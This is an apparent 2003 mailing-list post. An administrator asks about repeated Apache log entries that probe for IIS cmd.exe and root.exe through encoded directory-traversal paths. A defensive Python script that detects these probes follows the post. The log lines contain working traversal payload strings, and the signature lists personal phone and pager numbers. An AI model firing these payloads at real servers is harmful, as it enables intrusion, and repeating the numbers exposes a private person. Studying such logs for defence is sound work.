Hi, there,

For a while I have been seeing the following entries in my
Apache access log. It is always the same 16 lines,
coming from different IP addresses. I wonder if
somebody can shed some light on what it is and
where they come from. I know what these
requests will produce if cmd.exe is ever
found on my UNIX server. I wonder what actually
sends these requests: is it a robot, is it a virus, is
it some sort of indexing software? What is it?
Should I be concerned and should I take any
precautions?

66.189.100.35 - - [02/Jan/2003:08:08:31 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282
66.189.100.35 - - [02/Jan/2003:08:08:31 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 280
66.189.100.35 - - [02/Jan/2003:08:08:31 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290
66.189.100.35 - - [02/Jan/2003:08:08:31 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290
66.189.100.35 - - [02/Jan/2003:08:08:31 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
66.189.100.35 - - [02/Jan/2003:08:08:31 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321
66.189.100.35 - - [02/Jan/2003:08:08:31 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321
66.189.100.35 - - [02/Jan/2003:08:08:31 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337
66.189.100.35 - - [02/Jan/2003:08:08:32 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
66.189.100.35 - - [02/Jan/2003:08:08:32 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
66.189.100.35 - - [02/Jan/2003:08:08:32 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
66.189.100.35 - - [02/Jan/2003:08:08:32 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
66.189.100.35 - - [02/Jan/2003:08:08:32 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287
66.189.100.35 - - [02/Jan/2003:08:08:32 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287
66.189.100.35 - - [02/Jan/2003:08:08:32 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
66.189.100.35 - - [02/Jan/2003:08:08:32 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304


--------------

Dimitri (Dima) Shcherban

              Phone: 800-445-2588+3+36955
                 or: 508-898-6955
    Westborough ext: [823]-36955
           Cellular: 508-633-8192
              Pager: 877-563-1780
              email: [EMAIL PROTECTED]
        Pager email: [EMAIL PROTECTED]




---
Send mail for the `bblisa' mailing list to `[EMAIL PROTECTED]'.
Mail administrative requests to `[EMAIL PROTECTED]'.
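
A log-triage sketch for entries like the ones quoted above, added here as an example and not part of the original message: it percent-decodes each request path until it stops changing, flags requests that resolve to cmd.exe or root.exe, and reports per client whether any of them was answered with a 2xx status. The sample lines are constructed in the post's log format, and the names `classify` and `triage` are this example's own.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Constructed sample (Apache common log format), modelled on the entries in the post.
SAMPLE = """\
66.189.100.35 - - [02/Jan/2003:08:08:31 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282
66.189.100.35 - - [02/Jan/2003:08:08:31 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
66.189.100.35 - - [02/Jan/2003:08:08:32 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
66.189.100.35 - - [02/Jan/2003:08:08:32 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287
192.0.2.10 - - [02/Jan/2003:08:09:00 -0500] "GET /index.html HTTP/1.0" 200 1043
"""
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')
TARGET = re.compile(rb"(?:cmd|root)\.exe$", re.I)

def classify(raw_path):
    """Return the set of encoding tricks in a probe path, or None if not a probe."""
    data, rounds = raw_path.split("?", 1)[0].encode("latin-1"), 0
    while rounds < 4:                      # decode until stable, bounded
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data, rounds = decoded, rounds + 1
    if not TARGET.search(data):
        return None
    tricks = set()
    if rounds > 1:                         # e.g. %255c -> %5c -> backslash
        tricks.add("nested-percent-encoding")
    if b"\xc0" in data or b"\xc1" in data: # 0xC0/0xC1 never occur in valid UTF-8
        tricks.add("invalid-utf8-lead-byte")
    if b"../" in data or b"..\\" in data:
        tricks.add("dot-dot-traversal")
    return tricks

def triage(log_text):
    """Group probe requests by client IP; record tricks seen and any 2xx answer."""
    report = defaultdict(lambda: {"probes": 0, "tricks": set(), "served": False})
    for line in log_text.splitlines():
        m = LINE.match(line)
        tricks = classify(m.group(2)) if m else None
        if tricks is None:
            continue
        entry = report[m.group(1)]
        entry["probes"] += 1
        entry["tricks"] |= tricks
        entry["served"] |= m.group(3).startswith("2")
    return dict(report)

if __name__ == "__main__":
    for ip, e in triage(SAMPLE).items():
        print(ip, e["probes"], sorted(e["tricks"]), "SERVED" if e["served"] else "none served")
```

A `served` value of True for any client is the case worth investigating; in the sample every probe was answered with 404 or 400.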